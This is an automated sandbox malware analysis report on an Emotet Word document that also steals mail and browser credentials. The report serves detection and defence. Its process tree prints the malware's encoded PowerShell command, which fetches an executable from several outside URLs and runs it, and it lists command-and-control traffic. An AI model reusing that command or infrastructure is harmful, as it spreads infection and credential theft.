Loading ...

Play interactive tourEdit tour

Analysis Report SecuriteInfo.com.Exploit.Siggen2.13449.28674.8313

Overview

General Information

Sample Name:SecuriteInfo.com.Exploit.Siggen2.13449.28674.8313 (renamed file extension from 8313 to doc)
Analysis ID:255748
MD5:a218719fd104a4c006280fed89268170
SHA1:4a14ff4ab8445b69e5ad1960236a0c4c4b583d6e
SHA256:dc875f711c036d142c516a749754c9752e410f28c3a2223de920488093754e0b

Most interesting Screenshot:

Detection

Emotet MailPassView
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Emotet Banking Trojan found
Malicious encrypted Powershell command line found
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Emotet
Yara detected Emotet Downloader
Yara detected MailPassView
Allocates memory in foreign processes
Changes security center settings (notifications, updates, antivirus, firewall)
Creates processes via WMI
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Document contains an embedded VBA with hexadecimal encoded strings
Document contains an embedded VBA with many randomly named variables
Drops PE files to the user root directory
Drops executables to the windows directory (C:\Windows) and starts them
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Modifies the context of a thread in another process (thread injection)
PowerShell case anomaly found
Powershell drops PE file
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Very long command line found
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
AV process strings found (often used to terminate AV products)
Allocates a big amount of memory (probably used for heap spraying)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Process Creation
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • WINWORD.EXE (PID: 6096 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
  • svchost.exe (PID: 5508 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • powershell.exe (PID: 5712 cmdline: powersheLL -e JABUAFUATwBPAEYAagBqAGQAPQAnAEoARQBPAFUAUwBkAGUAawAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAARQBDAFUAUgBpAHQAeQBQAGAAUgBvAFQAbwBDAE8AbAAiACAAPQAgACcAdABsAHMAMQAyACwAIAB0AGwAcwAxADEALAAgAHQAbABzACcAOwAkAEMAVQBaAFEAWgB0AHkAYQAgAD0AIAAnADIAOAA1ACcAOwAkAE4ASQBCAEMAQwBvAHMAdgA9ACcASgBPAEYASwBIAHAAdABvACcAOwAkAEcARwBNAEIAUQBiAHkAaQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAQwBVAFoAUQBaAHQAeQBhACsAJwAuAGUAeABlACcAOwAkAFMAQgBDAFMATQBmAG8AZAA9ACcASQBCAFYATABPAG0AcABuACcAOwAkAE4AVwBEAEcATAB4AHIAbwA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwBiAGoAJwArACcAZQBjAHQAJwApACAATgBlAHQALgBXAEUAYgBjAGwASQBFAG4AVAA7ACQATwBaAEQAQQBLAGcAdgBwAD0AJwBoAHQAdABwADoALwAvAHIAZQBjAHQAaQBmAGkAYwBhAGQAbwBzAGMAYQByAHIAaQBvAG4ALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAEUAaQBRAC8AKgBoAHQAdABwADoALwAvAHIAZQBuAGUAawBvAGsALgBjAG8AbQAvAFEAYgBXAHkAYQB0AC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AbwBuAGwAaQBuAGUAbQBlAGQAaQBhAGQAZQBzAGkAZwBuAHMALgBjAG8AbQAvAGIAaQBuAC8AbgBPAGIAaAAvACoAaAB0AHQAcAA6AC8ALwByAGUAbgBlAGcAYQBkAGUAcgBhAGQAaQBvAC4AbgBlAHQALwBoAGEAdQBuAHQAZQBkAC8AYwBBADUAegB1AEMANQAvACoAaAB0AHQAcAA6AC8ALwBxAGEAdABpAGYAcwBwAG8AcgB0AC4AbgBlAHQALwB0AC8ATgBiAFEAcQAyADUANAAvACcALgAiAHMAcABgAGwASQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAUwBTAE0AQQBOAG8AYwB1AD0AJwBEAFQARwBGAFoAcABhAHMAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFoATgBaAEkASQBpAG4AaQAgAGkAbgAgACQATwBaAEQAQQBLAGcAdgBwACkAewB0AHIAeQB7ACQATgBXAEQARwBMAHgAcgBvAC4AIgBEAE8AdwBuAGAAbABgAE8AYABBAGQAZgBJAGwAZQAiACgAJABaAE4AWgBJAEkAaQBuAGkALAAgACQARwBHAE0AQgBRAGIAeQBpACkAOwAkAEYAVgBWAFYATgB5AGsAawA9ACcASwBYAEEAVABVAHUAZQBiACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQALQBJAHQAZQAnACsAJwBtACcAKQAgACQARwBHAE0AQgBRAGIAeQBpACkALgAiAGwARQBgAE4AZwBUAEgAIgAgAC0AZwBlACAAMwA2ADkANQA3ACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAnAHcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAJwApAC4AIgBDAFIAYABlAGEAYABUAEUAIgAoACQARwBHAE0AQgBRAGIAeQBpACkAOwAkAFMATgBPAFEAUwB5AGsAagA9ACcAQwBDAEcATABWAGcAawBzACcAOwBiAHIAZQBhAGsAOwAkAFcARQBPAFAARAB2AHIAeAA9ACcASwBZAE0AQQBYAHQAagBhACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEARgBEAFcARABvAG4AaAA9ACcARQBNAEUATgBLAGIAcQBmACcA MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 5084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • 285.exe (PID: 6044 cmdline: C:\Users\user\285.exe MD5: 769A6326DC875AB999B689266B13D788)
    • hnetcfg.exe (PID: 5548 cmdline: C:\Windows\SysWOW64\polstore\hnetcfg.exe MD5: 769A6326DC875AB999B689266B13D788)
      • hnetcfg.exe (PID: 1272 cmdline: 'C:\Windows\SysWOW64\polstore\hnetcfg.exe' 'C:\Users\user\AppData\Local\Temp\43E7.tmp' MD5: 769A6326DC875AB999B689266B13D788)
      • hnetcfg.exe (PID: 6108 cmdline: 'C:\Windows\SysWOW64\polstore\hnetcfg.exe' /scomma 'C:\Users\user\AppData\Local\Temp\4AED.tmp' MD5: 769A6326DC875AB999B689266B13D788)
      • hnetcfg.exe (PID: 2296 cmdline: 'C:\Windows\SysWOW64\polstore\hnetcfg.exe' /scomma 'C:\Users\user\AppData\Local\Temp\4F34.tmp' MD5: 769A6326DC875AB999B689266B13D788)
      • hnetcfgoe.exe (PID: 1908 cmdline: 'C:\Windows\SysWOW64\polstore\hnetcfgoe.exe' 'C:\Users\user\AppData\Local\Temp\43E7.tmp' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
  • svchost.exe (PID: 4888 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5364 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 5524 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 5988 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 472 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\Documents\20200802\PowerShell_transcript.610930.dI+g4eiZ.20200802005712.txtPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0x23:$s1: PowerShell
  • 0xfd:$s1: powersheLL
  • 0xf7d:$s1: PowerShell
  • 0x23:$sr1: PowerShell
  • 0xf7d:$sr1: PowerShell
  • 0x23:$sn3: PowerShell
  • 0xf7d:$sn3: PowerShell
  • 0xff:$a1: wersheLL -e
C:\Users\user\Documents\20200802\PowerShell_transcript.610930.dI+g4eiZ.20200802005712.txtJoeSecurity_EmotetDownloaderYara detected Emotet DownloaderJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000D.00000001.372041274.0000000000400000.00000040.00020000.sdmpAPT_NK_BabyShark_KimJoingRAT_Apr19_1Detects BabyShark KimJongRATFlorian Roth
    • 0x147b0:$a1: logins.json
    • 0x14710:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login
    • 0x14f34:$s4: \mozsqlite3.dll
    • 0x137a4:$s5: SMTP Password
    0000000D.00000001.372041274.0000000000400000.00000040.00020000.sdmpJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
      00000006.00000003.362342642.0000000002B07000.00000004.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        0000000C.00000002.374344399.0000000000400000.00000040.00000001.sdmpJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
          00000006.00000003.376128952.0000000003E80000.00000040.00000001.sdmpAPT_NK_BabyShark_KimJoingRAT_Apr19_1Detects BabyShark KimJongRATFlorian Roth
          • 0x147b0:$a1: logins.json
          • 0x14710:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login
          • 0x14f34:$s4: \mozsqlite3.dll
          • 0x137a4:$s5: SMTP Password
          Click to see the 21 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          6.2.hnetcfg.exe.3b00000.7.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
            13.1.hnetcfg.exe.400000.0.raw.unpackAPT_NK_BabyShark_KimJoingRAT_Apr19_1Detects BabyShark KimJongRATFlorian Roth
            • 0x147b0:$a1: logins.json
            • 0x14710:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login
            • 0x14f34:$s4: \mozsqlite3.dll
            • 0x137a4:$s5: SMTP Password
            13.1.hnetcfg.exe.400000.0.raw.unpackJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
              13.2.hnetcfg.exe.400000.0.raw.unpackAPT_NK_BabyShark_KimJoingRAT_Apr19_1Detects BabyShark KimJongRATFlorian Roth
              • 0x147b0:$a1: logins.json
              • 0x14710:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login
              • 0x14f34:$s4: \mozsqlite3.dll
              • 0x137a4:$s5: SMTP Password
              13.2.hnetcfg.exe.400000.0.raw.unpackJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
                Click to see the 19 entries

                Sigma Overview

                System Summary:

                barindex
                Sigma detected: Suspicious Process CreationShow sources
                Source: Process startedAuthor: Florian Roth, Daniil Yugoslavskiy, oscd.community (update): Data: Command: 'C:\Windows\SysWOW64\polstore\hnetcfg.exe' /scomma 'C:\Users\user\AppData\Local\Temp\4AED.tmp', CommandLine: 'C:\Windows\SysWOW64\polstore\hnetcfg.exe' /scomma 'C:\Users\user\AppData\Local\Temp\4AED.tmp', CommandLine|base64offset|contains: (f, Image: C:\Windows\SysWOW64\polstore\hnetcfg.exe, NewProcessName: C:\Windows\SysWOW64\polstore\hnetcfg.exe, OriginalFileName: C:\Windows\SysWOW64\polstore\hnetcfg.exe, ParentCommandLine: C:\Windows\SysWOW64\polstore\hnetcfg.exe, ParentImage: C:\Windows\SysWOW64\polstore\hnetcfg.exe, ParentProcessId: 5548, ProcessCommandLine: 'C:\Windows\SysWOW64\polstore\hnetcfg.exe' /scomma 'C:\Users\user\AppData\Local\Temp\4AED.tmp', ProcessId: 6108

                Signature Overview

                Click to jump to signature section

                Show All Signature Results
                Source: C:\Users\user\285.exeCode function: 5_2_00401078 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,
                Source: C:\Users\user\285.exeCode function: 5_2_00444717 lstrlenA,FindFirstFileA,FindClose,
                Source: C:\Users\user\285.exeCode function: 5_2_004047C0 FindFirstFileA,FindNextFileA,FindClose,
                Source: C:\Users\user\285.exeCode function: 5_2_004028E0 FindFirstFileA,FindClose,
                Source: C:\Users\user\285.exeCode function: 5_2_004390BA __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,
                Source: C:\Windows\SysWOW64\polstore\hnetcfg.exeCode function: 6_2_00401078 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,
                Source: C:\Windows\SysWOW64\polstore\hnetcfg.exeCode function: 6_2_00444717 lstrlenA,FindFirstFileA,FindClose,
                Source: C:\Windows\SysWOW64\polstore\hnetcfg.exeCode function: 6_2_004047C0 FindFirstFileA,FindNextFileA,FindClose,
                Source: C:\Windows\SysWOW64\polstore\hnetcfg.exeCode function: 6_2_004028E0 FindFirstFileA,FindClose,
                Source: C:\Windows\SysWOW64\polstore\hnetcfg.exeCode function: 6_2_004390BA __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,
                Source: C:\Windows\SysWOW64\polstore\hnetcfg.exeCode function: 12_2_0040A1A7 FindFirstFileW,FindNextFileW,
                Source: C:\Windows\SysWOW64\polstore\hnetcfg.exeCode function: 12_1_0040A1A7 FindFirstFileW,FindNextFileW,
                Source: C:\Windows\SysWOW64\polstore\hnetcfg.exeCode function: 13_2_0040702D FindFirstFileA,FindNextFileA,strlen,strlen,
                Source: C:\Windows\SysWOW64\polstore\hnetcfg.exeCode function: 13_1_0040702D FindFirstFileA,FindNextFileA,strlen,strlen,
                Source: C:\Windows\SysWOW64\polstore\hnetcfg.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\
                Source: C:\Windows\SysWOW64\polstore\hnetcfg.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
                Source: C:\Windows\SysWOW64\polstore\hnetcfg.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\
                Source: C:\Windows\SysWOW64\polstore\hnetcfg.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\
                Source: C:\Windows\SysWOW64\polstore\hnetcfg.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
                Source: C:\Windows\SysWOW64\polstore\hnetcfg.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\
                Source: winword.exeMemory has grown: Private usage: 0MB later: 63MB
                Source: global trafficDNS query: name: rectificadoscarrion.com
                Source: global trafficTCP traffic: 192.168.2.3:49705 -> 185.94.252.13:443
                Source: global trafficTCP traffic: 192.168.2.3:49702 -> 217.76.132.179:80

                Networking:

                barindex
                Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                Source: TrafficSnort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.3:49705 -> 185.94.252.13:443
                Source: global trafficHTTP traffic detected: GET /wp-includes/EiQ/ HTTP/1.1Host: rectificadoscarrion.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /OU3ZX52m5/nmqAIrkIJI1bik/zs7HrPUm7ELzb/NnwOyp/ HTTP/1.1Referer: http://185.94.252.13/OU3ZX52m5/nmqAIrkIJI1bik/zs7HrPUm7ELzb/NnwOyp/Content-Type: multipart/form-data; boundary=---------------------------316018655839823User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4580Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /V1bfVNXmGf/ HTTP/1.1Referer: http://185.94.252.13/V1bfVNXmGf/Content-Type: multipart/form-data; boundary=---------------------------892891687659634User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4580Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /XxXEdON5aVYXFRQitMj/oWmuuNtyx0q6einR/L2HdFwm6Bbbyl8/HG6zDRBX6Fqg1c/ HTTP/1.1Referer: http://185.94.252.13/XxXEdON5aVYXFRQitMj/oWmuuNtyx0q6einR/L2HdFwm6Bbbyl8/HG6zDRBX6Fqg1c/Content-Type: multipart/form-data; boundary=---------------------------131968411906821User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4580Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /l9mxCPCRzvrdJqd7gDg/8NeBfb/UP3O0TnX/bFLb7raYZ3UvCr/PYNusX3ERpHpdqNnga3/DDoS0Ahi/ HTTP/1.1Referer: http://185.94.252.13/l9mxCPCRzvrdJqd7gDg/8NeBfb/UP3O0TnX/bFLb7raYZ3UvCr/PYNusX3ERpHpdqNnga3/DDoS0Ahi/Content-Type: multipart/form-data; boundary=---------------------------949519084990397User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4596Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /pxUyBndrkFQg9MbC/BNGA/7r3Jr4QC8l8byshfZ/GE38Mqblnsqox/FGlnTj12jUpGlPKrKS/ HTTP/1.1Referer: http://185.94.252.13/pxUyBndrkFQg9MbC/BNGA/7r3Jr4QC8l8byshfZ/GE38Mqblnsqox/FGlnTj12jUpGlPKrKS/Content-Type: multipart/form-data; boundary=---------------------------814281218010596User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4596Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /nwkpxZwyjrCeZbfcf/fAnIZcRwnf99IuspZD/VFvg1jezY7LUpm/EiahSxVLNzl8Cwm9/fvlm/j3oA7SgmOJ3RXLHzKx/ HTTP/1.1Referer: http://185.94.252.13/nwkpxZwyjrCeZbfcf/fAnIZcRwnf99IuspZD/VFvg1jezY7LUpm/EiahSxVLNzl8Cwm9/fvlm/j3oA7SgmOJ3RXLHzKx/Content-Type: multipart/form-data; boundary=---------------------------234328357235502User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4596Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /HUU9YW2A/ HTTP/1.1Referer: http://88.217.172.65/HUU9YW2A/Content-Type: multipart/form-data; boundary=---------------------------010920034514373User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 88.217.172.65:443Content-Length: 4356Connection: Keep-AliveCache-Control: no-cache
                Source: unknownTCP traffic detected without corresponding DNS query: 73.116.193.136
                Source: unknownTCP traffic detected without corresponding DNS query: 73.116.193.136
                Source: unknownTCP traffic detected without corresponding DNS query: 73.116.193.136
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: global trafficHTTP traffic detected: GET /wp-includes/EiQ/ HTTP/1.1Host: rectificadoscarrion.comConnection: Keep-Alive
                Source: hnetcfg.exe, 0000000C.00000002.374983827.0000000000A89000.00000004.00000040.sdmpString found in binary or memory: ://192.168.2.1/temp/Office16.x86.en-US.ISOhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=1033&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfres://C:\Windows\system32\mmcndmgr.dll/views.htmfile:///C:/jbxinitvm.au3file:///C:/Users/user/Desktop/SecuriteInfo.com.Exploit.Siggen2.13449.28674.dochttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                Source: hnetcfg.exe, 0000000C.00000002.374983827.0000000000A89000.00000004.00000040.sdmpString found in binary or memory: ://192.168.2.1/temp/Office16.x86.en-US.ISOhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=1033&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfres://C:\Windows\system32\mmcndmgr.dll/views.htmfile:///C:/jbxinitvm.au3file:///C:/Users/user/Desktop/SecuriteInfo.com.Exploit.Siggen2.13449.28674.dochttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                Source: hnetcfg.exe, 00000006.00000003.376675052.000000000388D000.00000004.00000001.sdmp, hnetcfg.exe, 0000000C.00000002.374344399.0000000000400000.00000040.00000001.sdmpString found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                Source: hnetcfg.exe, 00000006.00000003.376675052.000000000388D000.00000004.00000001.sdmp, hnetcfg.exe, 0000000C.00000002.374344399.0000000000400000.00000040.00000001.sdmpString found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                Source: hnetcfg.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                Source: unknownDNS traffic detected: queries for: rectificadoscarrion.com
